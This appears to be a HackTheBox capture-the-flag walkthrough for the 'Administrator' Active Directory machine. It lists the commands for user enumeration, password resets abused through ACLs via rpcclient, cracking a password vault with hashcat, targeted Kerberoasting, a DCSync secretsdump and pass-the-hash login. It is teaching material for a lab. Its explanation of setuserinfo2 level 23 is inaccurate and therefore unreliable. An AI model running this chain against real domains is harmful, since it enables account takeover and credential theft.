Important Note
Enumeration
NMAP
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-25 20:02:37Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
60342/tcp open msrpc Microsoft Windows RPC
64997/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
65008/tcp open msrpc Microsoft Windows RPC
65013/tcp open msrpc Microsoft Windows RPC
65016/tcp open msrpc Microsoft Windows RPC
65035/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 6h59m58s
| smb2-time:
| date: 2024-11-25T20:03:26
|_ start_date: N/AShare Enumeration
User Enumeration
nxc smb administrator.htb -u 'olivia' -p 'ichliebedich' --rid-bruteolivia
michael
benjamin
emily
ethan
alexander
emmaFoothold
To establish a foothold, use the credentials and spawn a shell on the system using Evil-WinRM.
evil-winrm -i administrator.htb -u olivia -p ichliebedichThis provides a list of existing users on the system, but the relationship between them and your access is still missing. For this, BloodHound is the best tool to use.
User Enumeration with Blood-Hound
bloodhound-python -d administrator.htb -ns 10.10.11.42 -u olivia -p ichliebedich -c allWhen analyzing the data in BloodHound, it becomes clear that Olivia has the GenericAll relationship through the user Michael.
In Windows Active Directory, GenericAll refers to a specific type of permission granted to a user or group on an AD object (such as a user account, group, or organizational unit). GenericAll is a very broad and powerful permission, as it grants the user almost all available rights on that object.
This means that through the user Olivia, one can change the password of the user Michael.
When examining the user Michael, it becomes apparent that he has the rights to change the password of the user Benjamin.
Benjamin is in the “Share Moderators” group. If we now put everything together correctly, through the user Olivia, you should be able to change the password of the user Michael, through whom you can change the password of Benjamin, who is allowed to connect to the FTP server.
net user michael password /domainAnd then, by using rpcclient, log back into the system to change Benjamin’s password.
rpcclient -U michaelSetUserInfo2 is a function from the Windows API used to modify specific attributes of a user account within a Windows domain. It is primarily used in network applications and system administration scripts to update user information in Active Directory or local user accounts.
This function allows administrators or authorized users to change various properties of a user account, such as the user’s password, description, and other attributes related to the account. It works by interacting with the NetUserSetInfo function, which is responsible for modifying user account information at a higher level in the Windows operating system.
setuserinfo2 benjamin 23 'password'Level 23 in the SetUserInfo2 API refers to modifying user profile attributes, particularly in relation to setting or changing login time restrictions and other security policies for a user account. This level allows administrators to configure login restrictions, such as limiting when a user can log in based on time-of-day settings, or adjusting other security settings related to the user’s account profile.
With this functionality, it becomes possible to adjust access permissions that could potentially enable further actions within the network or system.
Now, it is possible to connect to the FTP server, and on this server, there is an interesting file:
PSAFE3 is a file format used by Panda Security software. It is an encrypted file typically utilized by the Panda Passwords application to securely store passwords, usernames, and other sensitive data.
When working with this file on an FTP server, it’s important to ensure that the FTP command is run with sudo privileges, as without the necessary permissions, you might not be able to download the file.
The password for the file can be easily cracked with Hashcat.
hashcat -m 5200 Backup.psafe3 /usr/share/wordlists/rockyou.txt The file contains user credentials for the users:
- emma
- alexander
- emily
Now, reconnect to the system using Evil-WinRM — the user flag is located on Emily’s desktop.
After spending some time on the system, I collected more data from Active Directory using BloodHound and the user Emily’s information. With this data, I was able to find something useful.
Emily has the GenericWrite permission over the user Ethan.
GenericWrite is a permission level in Active Directory (AD) that allows a user or group to modify almost all attributes of an object, without having full administrative control over that object. It is a fairly broad permission, but it does not carry the full privileges of an administrator.
This means that Emily can make significant changes to Ethan’s account or attributes, such as modifying properties like the password, group memberships, or other user details, but she cannot fully control the object or its settings as an administrator would.
As can be seen in this useful graphic, this permission can be exploited using Kerberoasting. However, this is only possible if the user has a Service Principal Name (SPN). In this case, Ethan does not have an SPN, so one must be created.
Kerberoasting
It took some time with Google, but I eventually came across the following GitHub repository:
GitHub – ShutdownRepo/targetedKerberoast: Kerberoast with ACL abuse capabilities
Kerberoast with ACL abuse capabilities. Contribute to ShutdownRepo/targetedKerberoast development by creating an…
This creates an SPN entry.
Unfortunately, I encountered the following error, which seems to be triggered by the time difference between the client and Active Directory.
[!] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)I checked the system time on the Active Directory server, which was actually 2 hours behind both my local time and the time on my VM.
Workaround:
- Switch to the root user.
- Run
timedatectl set-ntp offto disable automatic time updates via NTP. - Execute
rdate -n [Target IP]to synchronize the date and time with the target machine’s date and time.
Once the time issue is fixed, you will receive the hash, which can then be cracked using Hashcat.
Ethan’s permissions show that he has DCSync rights to the AD.
DCSync is a technique used to extract Active Directory (AD) data, particularly password hashes and Kerberos tickets, from domain controller servers.
impacket-secretsdump can be used to dump the hashes.
impacket-secretsdump administrator.htb/ethan:[email protected]And here is the administrator-password hash.
The hash can be used to log in via Evil-WinRM.
evil-winrm 10.10.11.42 -u administrator -H HASHHASHHASHHASHHASHHASHThe root-flag can be found at the desktop.
